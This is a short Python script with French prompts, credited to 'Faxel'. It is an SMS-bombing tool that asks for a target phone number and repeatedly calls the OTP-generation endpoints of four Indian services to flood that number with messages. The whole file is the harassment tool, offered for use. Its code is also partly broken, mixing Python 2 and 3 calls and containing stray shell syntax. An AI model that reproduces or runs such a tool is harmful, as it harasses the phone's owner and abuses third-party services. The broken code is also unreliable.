#!/usr/bin/python2
#coding=utf-8
#Dev: Faxel #!/bin/bash

import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize,fileinput
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
from time import sleep   
from urllib2 import *
from platform import system

def Envoi(cible, compteur, delai):
    Faxel_bombe = {
    "OYO Rooms": "https://www.oyorooms.com/api/pwa/generateotp?phone=",
    "Delhivery": "https://direct.delhivery.com/delhiverydirect/order/generate-otp?phoneNo=",
    "RailYatri": "https://www.railyatri.in/m/user-web-point?phone_number=",
    "ConfirmTkt": "https://securedapi.confirmtkt.com/api/platform/register?mobileNumber="
    }
    echec= 0
    requete = 0
    succes= int(requete) - int(echec)
    mael = int(compteur) + 1
    while succes != (int(mael)):
        api = random.choice(list(Faxel_bombe))
        print("==============================Faxel==============================="| lolcat) 
        print("                BOMBAGE en cours, veuillez patienter !!           ")
        print("Veuillez garder votre connexion de données active pendant le bombardement.")
        print("==================================================================")
        print("             Numéro cible                     : ", cible)
        print("             Nombre de demandes envoyées      : ", requete)
        print("             Requêtes réussies                : ", succes)
        print("             Requêtes ayant échoué            : ", echec)
        print("             API utilisée pour bombé la cible : ", api)
        print("==================================================================")
        reponse_url = str(Faxel_bombe[api])+cible
        try:
            requete = requete + 1
            urllib.request.urlopen(str(reponse_url))
            succes = succes + 1
        except (urllib.error.HTTPError, urllib.error.URLError):
            echec = echec + 1
            continue
        time.sleep(float(delai))
print("\n")
Envoi(input("Entrer le numero de votre cible :  "), input("Entrer le nombre de replique de sms : "), input("Entrer Temps de retard (en secondes) : "))
